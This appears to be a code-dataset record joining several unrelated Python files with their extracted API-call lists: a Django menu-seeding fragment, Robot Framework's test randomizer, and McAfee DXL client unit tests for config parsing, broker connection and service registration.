[((215, 250), 'oms_cms.backend.menu.models.Menu.objects.create', 'Menu.objects.create', ([], {'name': '"""Верхнее"""'}), "(name='Верхнее')\n", (234, 250), False, 'from oms_cms.backend.menu.models import Menu, MenuItem\n'), ((259, 334), 'oms_cms.backend.menu.models.MenuItem.objects.create', 'MenuItem.objects.create', ([], {'title': '"""Главная"""', 'name': '"""home"""', 'menu': 'menu', 'lang_id': '(1)'}), "(title='Главная', name='home', menu=menu, lang_id=1)\n", (282, 334), False, 'from oms_cms.backend.menu.models import Menu, MenuItem\n'), ((343, 418), 'oms_cms.backend.menu.models.MenuItem.objects.create', 'MenuItem.objects.create', ([], {'title': '"""Новости"""', 'name': '"""news"""', 'menu': 'menu', 'lang_id': '(1)'}), "(title='Новости', name='news', menu=menu, lang_id=1)\n", (366, 418), False, 'from oms_cms.backend.menu.models import Menu, MenuItem\n'), ((435, 472), 'oms_cms.backend.menu.models.Menu.objects.create', 'Menu.objects.create', ([], {'name': '"""Верхнее 2"""'}), "(name='Верхнее 2')\n", (454, 472), False, 'from oms_cms.backend.menu.models import Menu, MenuItem\n'), ((481, 560), 'oms_cms.backend.menu.models.MenuItem.objects.create', 'MenuItem.objects.create', ([], {'title': '"""Контакты"""', 'name': '"""contact"""', 'menu': 'menu', 'lang_id': '(1)'}), "(title='Контакты', name='contact', menu=menu, lang_id=1)\n", (504, 560), False, 'from oms_cms.backend.menu.models import Menu, MenuItem\n')]
|
# Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from random import Random
from robotide.lib.robot.model import SuiteVisitor
class Randomizer(SuiteVisitor):
def __init__(self, randomize_suites=True, randomize_tests=True, seed=None):
self.randomize_suites = randomize_suites
self.randomize_tests = randomize_tests
self.seed = seed
# Cannot use just Random(seed) due to
# https://ironpython.codeplex.com/workitem/35155
args = (seed,) if seed is not None else ()
self._shuffle = Random(*args).shuffle
def start_suite(self, suite):
if not self.randomize_suites and not self.randomize_tests:
return False
if self.randomize_suites:
self._shuffle(suite.suites)
if self.randomize_tests:
self._shuffle(suite.tests)
if not suite.parent:
suite.metadata['Randomized'] = self._get_message()
def _get_message(self):
possibilities = {(True, True): 'Suites and tests',
(True, False): 'Suites',
(False, True): 'Tests'}
randomized = (self.randomize_suites, self.randomize_tests)
return '%s (seed %s)' % (possibilities[randomized], self.seed)
def visit_test(self, test):
pass
def visit_keyword(self, kw):
pass
|
[
"random.Random"
] |
[((1135, 1148), 'random.Random', 'Random', (['*args'], {}), '(*args)\n', (1141, 1148), False, 'from random import Random\n')]
|
# -*- coding: utf-8 -*-
################################################################################
# Copyright (c) 2014 McAfee Inc. - All Rights Reserved.
################################################################################
# Run with python -m unittest dxlclient.test.test_dxlclient
import unittest
import time
import threading
from base_test import BaseClientTest
import io
from nose.plugins.attrib import attr
from nose_parameterized import parameterized
from mock import Mock, patch
from textwrap import dedent
import __builtin__
import dxlclient._global_settings
from dxlclient import Request
from dxlclient import Response
from dxlclient import Event
from dxlclient import ErrorResponse
from dxlclient import DxlClient
from dxlclient import DxlClientConfig
from dxlclient import Broker
from dxlclient import UuidGenerator
from dxlclient import EventCallback
from dxlclient import RequestCallback
from dxlclient import ResponseCallback
from dxlclient import DxlException
from dxlclient import BrokerListError
from dxlclient._global_settings import *
CONFIG_DATA_NO_CERTS_SECTION = """
[no_certs]
BrokerCertChain: certchain.pem
CertFile: certfile.pem
PrivateKey: privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_CA_OPTION = """
[Certs]
CertFile: certfile.pem
PrivateKey: privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_CERT_OPTION = """
[Certs]
BrokerCertChain: certchain.pem
PrivateKey: privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_PK_OPTION = """
[Certs]
BrokerCertChain: certchain.pem
CertFile: certfile.pem
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_BROKERS_SECTION = """
[Certs]
BrokerCertChain: certchain.pem
CertFile: certfile.pem
PrivateKey: privatekey.pk
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
CONFIG_DATA_NO_BROKERS_OPTION = """
[Certs]
BrokerCertChain: certchain.pem
CertFile: certfile.pem
PrivateKey: privatekey.pk
[Brokers]
"""
class DxlClientConfigTest(unittest.TestCase):
@parameterized.expand([
(None,),
("",)
])
def test_config_throws_value_error_for_empty_ca_bundle(self, ca_bundle):
self.assertRaises(ValueError, DxlClientConfig, broker_ca_bundle=ca_bundle,
cert_file=get_cert_file_pem(), private_key=get_dxl_private_key(), brokers=[])
@parameterized.expand([
(None,),
("",)
])
def test_config_throws_value_error_for_empty_cert_file(self, cert_file):
self.assertRaises(ValueError, DxlClientConfig,
cert_file=cert_file, broker_ca_bundle=get_ca_bundle_pem(), private_key=get_dxl_private_key(),
brokers=[])
def test_get_fastest_broker_gets_the_fastest(self):
semaphore = threading.Semaphore(0)
# Mock brokers connect speed
fast_broker = Mock()
slow_broker = Mock()
def connect_to_broker_slow():
import time
semaphore.acquire()
time.sleep(0.1)
return
def connect_to_broker_fast():
semaphore.release()
return
slow_broker._connect_to_broker = connect_to_broker_slow
fast_broker._connect_to_broker = connect_to_broker_fast
# Create config and add brokers
config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
config.brokers.append(fast_broker)
config.brokers.append(slow_broker)
# Check that the returned is the fastest
self.assertEqual(config._get_fastest_broker(), fast_broker)
def test_get_sorted_broker_list_returns_empty_when_no_brokers(self):
config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
self.assertEqual(config._get_sorted_broker_list(), [])
def test_get_sorted_broker_list_returns_all_brokers(self):
# Create config
config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
# Create mocked brokers
b1 = Mock()
b2 = Mock()
b1._connect_to_broker = b2._connect_to_broker = Mock(return_value=True)
# Add them to config
config.brokers.append(b1)
config.brokers.append(b2)
# Get all brokers
l = config._get_sorted_broker_list()
# Check all brokers are in the list
self.assertTrue(b1 in l)
self.assertTrue(b2 in l)
@parameterized.expand([
({"BrokersList": "Actually not a brokers list"},)
])
def test_get_brokers_raises_exception_from_invalid_json(self, policy):
config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
with self.assertRaises(BrokerListError):
config._set_brokers_from_json(policy)
def test_set_config_from_file_generates_dxl_config(self):
read_data = """
[Certs]
BrokerCertChain: certchain.pem
CertFile: certfile.pem
PrivateKey: privatekey.pk
[Brokers]
22cdcace-6e8f-11e5-29c0-005056aa56de: 22cdcace-6e8f-11e5-29c0-005056aa56de;8883;dxl-broker-1;10.218.73.206
"""
with patch.object(__builtin__, 'open', return_value=io.BytesIO(dedent(read_data))):
client_config = DxlClientConfig.create_dxl_config_from_file("mock_file")
self.assertEqual(client_config.cert_file, "certfile.pem")
self.assertEqual(client_config.broker_ca_bundle, "certchain.pem")
self.assertEqual(client_config.private_key, "privatekey.pk")
broker = client_config.brokers[0]
self.assertEqual(broker.host_name, "dxl-broker-1")
self.assertEqual(broker.ip_address, "10.218.73.206")
self.assertEqual(broker.port, 8883)
self.assertEqual(broker.unique_id, "22cdcace-6e8f-11e5-29c0-005056aa56de")
def test_set_config_wrong_file_raises_exception(self):
with self.assertRaises(Exception):
DxlClientConfig.create_dxl_config_from_file("this_file_doesnt_exist.cfg")
@parameterized.expand([
(CONFIG_DATA_NO_CERTS_SECTION,),
(CONFIG_DATA_NO_CA_OPTION,),
(CONFIG_DATA_NO_CERT_OPTION,),
(CONFIG_DATA_NO_PK_OPTION,),
])
def test_missing_certs_raises_exception(self, read_data):
with patch.object(__builtin__, 'open', return_value=io.BytesIO(dedent(read_data))):
with self.assertRaises(ValueError):
DxlClientConfig.create_dxl_config_from_file("mock_file.cfg")
@parameterized.expand([
(CONFIG_DATA_NO_BROKERS_SECTION,),
(CONFIG_DATA_NO_BROKERS_OPTION,),
])
def test_missing_brokers_doesnt_raise_exceptions(self, read_data):
with patch.object(__builtin__, 'open', return_value=io.BytesIO(dedent(read_data))):
client_config = DxlClientConfig.create_dxl_config_from_file("mock_file.cfg")
self.assertEqual(len(client_config.brokers), 0)
class DxlClientTest(unittest.TestCase):
def setUp(self):
self.config = DxlClientConfig(broker_ca_bundle=get_ca_bundle_pem(),
cert_file=get_cert_file_pem(),
private_key=get_dxl_private_key(),
brokers=[])
mqtt_client_patch = patch('paho.mqtt.client.Client')
mqtt_client_patch.start()
self.client = DxlClient(self.config)
self.client._request_manager.wait_for_response = Mock(return_value=Response(request=None))
self.test_channel = '/test/channel'
def tearDown(self):
patch.stopall()
def test_client_raises_exception_on_connect_when_already_connecting(self):
self.client._client.connect.side_effect = Exception("An exception!")
class MyThread(threading.Thread):
def __init__(self, client):
super(MyThread, self).__init__()
self._client = client
def run(self):
self._client.connect()
t = MyThread(self.client)
t.setDaemon(True)
t.start()
time.sleep(2)
self.assertEqual(self.client.connected, False)
with self.assertRaises(DxlException):
self.client.connect()
# self.client.disconnect()
def test_client_raises_exception_on_connect_when_already_connected(self):
self.client._client.connect.side_effect = Exception("An exception!")
self.client._connected = Mock(return_value=True)
with self.assertRaises(DxlException):
self.client.connect()
# self.client.disconnect()
# The following test is too slow
def test_client_disconnect_doesnt_raises_exception_on_disconnect_when_disconnected(self):
self.assertEqual(self.client.connected, False)
self.client.disconnect()
self.client.disconnect()
@parameterized.expand([
# (connect + retries) * 2 = connect_count
(0, 2),
(1, 4),
(2, 6),
])
def test_client_retries_defines_how_many_times_the_client_retries_connection(self, retries, connect_count):
# Client wont' connect ;)
self.client._client.connect = Mock(side_effect=Exception('Could not connect'))
# No delay between retries (faster unit tests)
self.client.config.reconnect_delay = 0
self.client._wait_for_policy_delay = 0
broker = Broker(host_name='localhost')
broker._parse(UuidGenerator.generate_id_as_string() + ";9999;localhost;127.0.0.1")
self.client.config.brokers = [broker]
self.client.config.connect_retries = retries
with self.assertRaises(DxlException):
self.client.connect()
self.assertEqual(self.client._client.connect.call_count, connect_count)
# self.client.disconnect()
def test_client_subscribe_adds_subscription_when_not_connected(self):
self.client._client.subscribe = Mock(return_value=None)
self.assertFalse(self.client.connected)
self.client.subscribe(self.test_channel)
self.assertTrue(self.test_channel in self.client.subscriptions)
self.assertEqual(self.client._client.subscribe.call_count, 0)
def test_client_unsubscribe_removes_subscription_when_not_connected(self):
self.client._client.unsubscribe = Mock(return_value=None)
self.assertFalse(self.client.connected)
# Add subscription
self.client.subscribe(self.test_channel)
self.assertTrue(self.test_channel in self.client.subscriptions)
# Remove subscription
self.client.unsubscribe(self.test_channel)
self.assertFalse(self.test_channel in self.client.subscriptions)
def test_client_subscribe_doesnt_add_twice_same_channel(self):
# Mock client.subscribe and is_connected
self.client._client.subscribe = Mock(return_value=None)
self.client._connected = Mock(return_value=True)
# We always have the default (myself) channel
self.assertEqual(len(self.client.subscriptions), 1)
self.client.subscribe(self.test_channel)
self.assertEqual(len(self.client.subscriptions), 2)
self.client.subscribe(self.test_channel)
self.assertEqual(len(self.client.subscriptions), 2)
self.assertEqual(self.client._client.subscribe.call_count, 1)
def test_client_handle_message_with_event_calls_event_callback(self):
event_callback = EventCallback()
event_callback.on_event = Mock()
self.client.add_event_callback(self.test_channel, event_callback)
# Create and process Event
evt = Event(destination_topic=self.test_channel)._to_bytes()
self.client._handle_message(self.test_channel, evt)
# Check that callback was called
self.assertEqual(event_callback.on_event.call_count, 1)
def test_client_handle_message_with_request_calls_request_callback(self):
req_callback = RequestCallback()
req_callback.on_request = Mock()
self.client.add_request_callback(self.test_channel, req_callback)
# Create and process Request
req = Request(destination_topic=self.test_channel)._to_bytes()
self.client._handle_message(self.test_channel, req)
# Check that callback was called
self.assertEqual(req_callback.on_request.call_count, 1)
def test_client_handle_message_with_response_calls_response_callback(self):
callback = ResponseCallback()
callback.on_response = Mock()
self.client.add_response_callback(self.test_channel, callback)
# Create and process Response
msg = Response(request=None)._to_bytes()
self.client._handle_message(self.test_channel, msg)
# Check that callback was called
self.assertEqual(callback.on_response.call_count, 1)
def test_client_send_event_publishes_message_to_dxl_fabric(self):
self.client._client.publish = Mock(return_value=None)
# Create and process Request
msg = Event(destination_topic="")
self.client.send_event(msg)
# Check that callback was called
self.assertEqual(self.client._client.publish.call_count, 1)
def test_client_send_request_publishes_message_to_dxl_fabric(self):
self.client._client.publish = Mock(return_value=None)
# Create and process Request
msg = Request(destination_topic="")
self.client._send_request(msg)
# Check that callback was called
self.assertEqual(self.client._client.publish.call_count, 1)
def test_client_send_response_publishes_message_to_dxl_fabric(self):
self.client._client.publish = Mock(return_value=None)
# Create and process Request
msg = Response(request=None)
self.client.send_response(msg)
# Check that callback was called
self.assertEqual(self.client._client.publish.call_count, 1)
def test_client_handles_error_response_and_fire_response_handler(self):
self.client._fire_response = Mock(return_value=None)
# Create and process Request
msg = ErrorResponse(request=None, error_code=666, error_message="test message")
payload = msg._to_bytes()
# Handle error response message
self.client._handle_message(self.test_channel, payload)
# Check that message response was properly delivered to handler
self.assertEqual(self.client._fire_response.call_count, 1)
"""
Service unit tests
"""
def test_client_register_service_subscribes_client_to_channel(self):
channel1 = '/mcafee/service/unittest/one'
channel2 = '/mcafee/service/unittest/two'
# Create dummy service
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
service_info.add_topic(channel1, RequestCallback())
service_info.add_topic(channel2, RequestCallback())
# Register service in client
self.client.register_service_async(service_info)
# Check subscribed channels
subscriptions = self.client.subscriptions
assert channel1 in subscriptions, "Client wasn't subscribed to service channel"
assert channel2 in subscriptions, "Client wasn't subscribed to service channel"
def test_client_wont_register_the_same_service_twice(self):
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
# Register service in client
self.client.register_service_async(service_info)
with self.assertRaises(dxlclient.DxlException):
# Re-register service
self.client.register_service_async(service_info)
def test_client_register_service_sends_register_request_to_broker(self):
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
self.client._send_request = Mock(return_value=True)
self.client._connected = Mock(return_value=True)
# Register service in client
self.client.register_service_async(service_info)
time.sleep(2)
# Check that method has been called
self.assertTrue(self.client._send_request.called)
def test_client_register_service_unsubscribes_client_to_channel(self):
channel1 = '/mcafee/service/unittest/one'
channel2 = '/mcafee/service/unittest/two'
# Create dummy service
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
service_info.add_topic(channel1, RequestCallback())
service_info.add_topic(channel2, RequestCallback())
# Register service in client
self.client.register_service_async(service_info)
# Check subscribed channels
subscriptions = self.client.subscriptions
assert channel1 in subscriptions, "Client wasn't subscribed to service channel"
assert channel2 in subscriptions, "Client wasn't subscribed to service channel"
self.client.unregister_service_async(service_info)
subscriptions = self.client.subscriptions
assert channel1 not in subscriptions, "Client wasn't unsubscribed to service channel"
assert channel2 not in subscriptions, "Client wasn't unsubscribed to service channel"
def test_client_register_service_unsuscribes_from_channel_by_guid(self):
channel1 = '/mcafee/service/unittest/one'
channel2 = '/mcafee/service/unittest/two'
# Create dummy service
service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
service_info.add_topic(channel1, RequestCallback())
service_info.add_topic(channel2, RequestCallback())
# Create same dummy service - different object
service_info2 = service_info = dxlclient.service.ServiceRegistrationInfo(
service_type='/mcafee/service/unittest', client=self.client)
service_info._service_id = service_info.service_id
service_info.add_topic(channel1, RequestCallback())
service_info.add_topic(channel2, RequestCallback())
# Register service in client
self.client.register_service_async(service_info)
# Check subscribed channels
subscriptions = self.client.subscriptions
assert channel1 in subscriptions, "Client wasn't subscribed to service channel"
assert channel2 in subscriptions, "Client wasn't subscribed to service channel"
self.client.unregister_service_async(service_info2)
subscriptions = self.client.subscriptions
assert channel1 not in subscriptions, "Client wasn't unsubscribed to service channel"
assert channel2 not in subscriptions, "Client wasn't unsubscribed to service channel"
@attr('system')
class DxlClientSystemClientTest(BaseClientTest):
def test_client_connects_to_broker_and_sets_current_broker(self):
with self.create_client() as client:
client.connect()
broker_id = "unique_broker_id_1"
self.assertTrue(client.connected)
self.assertEqual(client.current_broker.unique_id, broker_id)
def test_client_raises_exception_when_cannot_sync_connect_to_broker(self):
with self.create_client() as client:
broker = Broker("localhost", UuidGenerator.generate_id_as_string(), "127.0.0.1")
client._config.brokers = [broker]
with self.assertRaises(DxlException):
client.connect()
def test_client_receives_event_on_topic_only_after_subscribe(self):
"""
The idea of this test is to send an event to a topic which we are not
subscribed, so we shouldn't be notified. Then, we subscribe to that
topic and send a new event, we should get that last one.
"""
with self.create_client() as client:
test_topic = '/test/whatever/' + client.config._client_id
client.connect()
time.sleep(2)
self.assertTrue(client.connected)
# Set request callback (use mock to easily check when it was called)
ecallback = EventCallback()
ecallback.on_event = Mock()
client.add_event_callback(test_topic, ecallback, False)
# Send event thru dxl fabric to a topic which we are *not* subscribed
msg = Event(destination_topic=test_topic)
client.send_event(msg)
time.sleep(1)
# We haven't been notified
self.assertEqual(ecallback.on_event.call_count, 0)
# Subscribe to topic
client.subscribe(test_topic)
time.sleep(1)
# Send event thru dxl fabric again to that topic
msg = Event(destination_topic=test_topic)
client.send_event(msg)
time.sleep(1)
# Now we should have been notified of the event
self.assertEqual(ecallback.on_event.call_count, 1)
def test_client_receives_error_response_on_request_to_unknown_service(self):
"""
The idea of this test is to send a sync request to an unknown service
and get a "unable to locate service" error response.
"""
with self.create_client() as client:
test_topic = '/test/doesntexists/' + client.config._client_id
client.connect()
time.sleep(2)
self.assertTrue(client.connected)
# Send request thru dxl fabric to a service which doesn't exists
msg = Request(destination_topic=test_topic)
msg.service_id = UuidGenerator.generate_id_as_string()
response = client.sync_request(msg, 1)
# Check that we have an error response for our request
self.assertTrue(isinstance(response, ErrorResponse))
self.assertEqual(response.service_id, msg.service_id)
if __name__ == '__main__':
unittest.main()
|
[
"dxlclient.Response",
"dxlclient.DxlClientConfig.create_dxl_config_from_file",
"dxlclient.Request",
"dxlclient.EventCallback",
"unittest.main",
"nose_parameterized.parameterized.expand",
"dxlclient.RequestCallback",
"dxlclient.DxlClient",
"dxlclient.Event",
"dxlclient.Broker",
"nose.plugins.attrib.attr",
"dxlclient.ErrorResponse",
"mock.patch",
"time.sleep",
"mock.patch.stopall",
"dxlclient.ResponseCallback",
"textwrap.dedent",
"mock.Mock",
"dxlclient.UuidGenerator.generate_id_as_string",
"threading.Semaphore"
] |
[((19945, 19959), 'nose.plugins.attrib.attr', 'attr', (['"""system"""'], {}), "('system')\n", (19949, 19959), False, 'from nose.plugins.attrib import attr\n'), ((2399, 2437), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (["[(None,), ('',)]"], {}), "([(None,), ('',)])\n", (2419, 2437), False, 'from nose_parameterized import parameterized\n'), ((2730, 2768), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (["[(None,), ('',)]"], {}), "([(None,), ('',)])\n", (2750, 2768), False, 'from nose_parameterized import parameterized\n'), ((5286, 5359), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (["[({'BrokersList': 'Actually not a brokers list'},)]"], {}), "([({'BrokersList': 'Actually not a brokers list'},)])\n", (5306, 5359), False, 'from nose_parameterized import parameterized\n'), ((7052, 7206), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (['[(CONFIG_DATA_NO_CERTS_SECTION,), (CONFIG_DATA_NO_CA_OPTION,), (\n CONFIG_DATA_NO_CERT_OPTION,), (CONFIG_DATA_NO_PK_OPTION,)]'], {}), '([(CONFIG_DATA_NO_CERTS_SECTION,), (\n CONFIG_DATA_NO_CA_OPTION,), (CONFIG_DATA_NO_CERT_OPTION,), (\n CONFIG_DATA_NO_PK_OPTION,)])\n', (7072, 7206), False, 'from nose_parameterized import parameterized\n'), ((7521, 7617), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (['[(CONFIG_DATA_NO_BROKERS_SECTION,), (CONFIG_DATA_NO_BROKERS_OPTION,)]'], {}), '([(CONFIG_DATA_NO_BROKERS_SECTION,), (\n CONFIG_DATA_NO_BROKERS_OPTION,)])\n', (7541, 7617), False, 'from nose_parameterized import parameterized\n'), ((9875, 9921), 'nose_parameterized.parameterized.expand', 'parameterized.expand', (['[(0, 2), (1, 4), (2, 6)]'], {}), '([(0, 2), (1, 4), (2, 6)])\n', (9895, 9921), False, 'from nose_parameterized import parameterized\n'), ((23083, 23098), 'unittest.main', 'unittest.main', ([], {}), '()\n', (23096, 23098), False, 'import unittest\n'), ((3158, 3180), 'threading.Semaphore', 'threading.Semaphore', (['(0)'], {}), '(0)\n', (3177, 3180), False, 'import threading\n'), ((3240, 3246), 'mock.Mock', 'Mock', ([], {}), '()\n', (3244, 3246), False, 'from mock import Mock, patch\n'), ((3269, 3275), 'mock.Mock', 'Mock', ([], {}), '()\n', (3273, 3275), False, 'from mock import Mock, patch\n'), ((4895, 4901), 'mock.Mock', 'Mock', ([], {}), '()\n', (4899, 4901), False, 'from mock import Mock, patch\n'), ((4915, 4921), 'mock.Mock', 'Mock', ([], {}), '()\n', (4919, 4921), False, 'from mock import Mock, patch\n'), ((4978, 5001), 'mock.Mock', 'Mock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (4982, 5001), False, 'from mock import Mock, patch\n'), ((8308, 8340), 'mock.patch', 'patch', (['"""paho.mqtt.client.Client"""'], {}), "('paho.mqtt.client.Client')\n", (8313, 8340), False, 'from mock import Mock, patch\n'), ((8398, 8420), 'dxlclient.DxlClient', 'DxlClient', (['self.config'], {}), '(self.config)\n', (8407, 8420), False, 'from dxlclient import DxlClient\n'), ((8598, 8613), 'mock.patch.stopall', 'patch.stopall', ([], {}), '()\n', (8611, 8613), False, 'from mock import Mock, patch\n'), ((9095, 9108), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (9105, 9108), False, 'import time\n'), ((9473, 9496), 'mock.Mock', 'Mock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (9477, 9496), False, 'from mock import Mock, patch\n'), ((10403, 10432), 'dxlclient.Broker', 'Broker', ([], {'host_name': '"""localhost"""'}), "(host_name='localhost')\n", (10409, 10432), False, 'from dxlclient import Broker\n'), ((10935, 10958), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (10939, 10958), False, 'from mock import Mock, patch\n'), ((11321, 11344), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (11325, 11344), False, 'from mock import Mock, patch\n'), ((11852, 11875), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (11856, 11875), False, 'from mock import Mock, patch\n'), ((11909, 11932), 'mock.Mock', 'Mock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (11913, 11932), False, 'from mock import Mock, patch\n'), ((12436, 12451), 'dxlclient.EventCallback', 'EventCallback', ([], {}), '()\n', (12449, 12451), False, 'from dxlclient import EventCallback\n'), ((12486, 12492), 'mock.Mock', 'Mock', ([], {}), '()\n', (12490, 12492), False, 'from mock import Mock, patch\n'), ((12938, 12955), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (12953, 12955), False, 'from dxlclient import RequestCallback\n'), ((12990, 12996), 'mock.Mock', 'Mock', ([], {}), '()\n', (12994, 12996), False, 'from mock import Mock, patch\n'), ((13444, 13462), 'dxlclient.ResponseCallback', 'ResponseCallback', ([], {}), '()\n', (13460, 13462), False, 'from dxlclient import ResponseCallback\n'), ((13494, 13500), 'mock.Mock', 'Mock', ([], {}), '()\n', (13498, 13500), False, 'from mock import Mock, patch\n'), ((13930, 13953), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (13934, 13953), False, 'from mock import Mock, patch\n'), ((14005, 14032), 'dxlclient.Event', 'Event', ([], {'destination_topic': '""""""'}), "(destination_topic='')\n", (14010, 14032), False, 'from dxlclient import Event\n'), ((14289, 14312), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14293, 14312), False, 'from mock import Mock, patch\n'), ((14364, 14393), 'dxlclient.Request', 'Request', ([], {'destination_topic': '""""""'}), "(destination_topic='')\n", (14371, 14393), False, 'from dxlclient import Request\n'), ((14654, 14677), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (14658, 14677), False, 'from mock import Mock, patch\n'), ((14729, 14751), 'dxlclient.Response', 'Response', ([], {'request': 'None'}), '(request=None)\n', (14737, 14751), False, 'from dxlclient import Response\n'), ((15014, 15037), 'mock.Mock', 'Mock', ([], {'return_value': 'None'}), '(return_value=None)\n', (15018, 15037), False, 'from mock import Mock, patch\n'), ((15089, 15162), 'dxlclient.ErrorResponse', 'ErrorResponse', ([], {'request': 'None', 'error_code': '(666)', 'error_message': '"""test message"""'}), "(request=None, error_code=666, error_message='test message')\n", (15102, 15162), False, 'from dxlclient import ErrorResponse\n'), ((17005, 17028), 'mock.Mock', 'Mock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (17009, 17028), False, 'from mock import Mock, patch\n'), ((17062, 17085), 'mock.Mock', 'Mock', ([], {'return_value': '(True)'}), '(return_value=True)\n', (17066, 17085), False, 'from mock import Mock, patch\n'), ((17189, 17202), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (17199, 17202), False, 'import time\n'), ((3384, 3399), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (3394, 3399), False, 'import time\n'), ((6270, 6326), 'dxlclient.DxlClientConfig.create_dxl_config_from_file', 'DxlClientConfig.create_dxl_config_from_file', (['"""mock_file"""'], {}), "('mock_file')\n", (6313, 6326), False, 'from dxlclient import DxlClientConfig\n'), ((6972, 7045), 'dxlclient.DxlClientConfig.create_dxl_config_from_file', 'DxlClientConfig.create_dxl_config_from_file', (['"""this_file_doesnt_exist.cfg"""'], {}), "('this_file_doesnt_exist.cfg')\n", (7015, 7045), False, 'from dxlclient import DxlClientConfig\n'), ((7827, 7887), 'dxlclient.DxlClientConfig.create_dxl_config_from_file', 'DxlClientConfig.create_dxl_config_from_file', (['"""mock_file.cfg"""'], {}), "('mock_file.cfg')\n", (7870, 7887), False, 'from dxlclient import DxlClientConfig\n'), ((15865, 15882), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (15880, 15882), False, 'from dxlclient import RequestCallback\n'), ((15925, 15942), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (15940, 15942), False, 'from dxlclient import RequestCallback\n'), ((17692, 17709), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (17707, 17709), False, 'from dxlclient import RequestCallback\n'), ((17752, 17769), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (17767, 17769), False, 'from dxlclient import RequestCallback\n'), ((18816, 18833), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (18831, 18833), False, 'from dxlclient import RequestCallback\n'), ((18876, 18893), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (18891, 18893), False, 'from dxlclient import RequestCallback\n'), ((19206, 19223), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (19221, 19223), False, 'from dxlclient import RequestCallback\n'), ((19266, 19283), 'dxlclient.RequestCallback', 'RequestCallback', ([], {}), '()\n', (19281, 19283), False, 'from dxlclient import RequestCallback\n'), ((21141, 21154), 'time.sleep', 'time.sleep', (['(2)'], {}), '(2)\n', (21151, 21154), False, 'import time\n'), ((21307, 21322), 'dxlclient.EventCallback', 'EventCallback', ([], {}), '()\n', (21320, 21322), False, 'from dxlclient import EventCallback\n'), ((21356, 21362), 'mock.Mock', 'Mock', ([], {}), '()\n', (21360, 21362), False, 'from mock import Mock, patch\n'), ((21532, 21567), 'dxlclient.Event', 'Event', ([], {'destination_topic': 'test_topic'}), '(destination_topic=test_topic)\n', (21537, 21567), False, 'from dxlclient import Event\n'), ((21616, 21629), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (21626, 21629), False, 'import time\n'), ((21819, 21832), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (21829, 21832), False, 'import time\n'), ((21913, 21948), 'dxlclient.Event', 'Event', ([], {'destination_topic': 'test_topic'}), '(destination_topic=test_topic)\n', (21918, 21948), False, 'from dxlclient import Event\n'), ((21997, 22010), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', 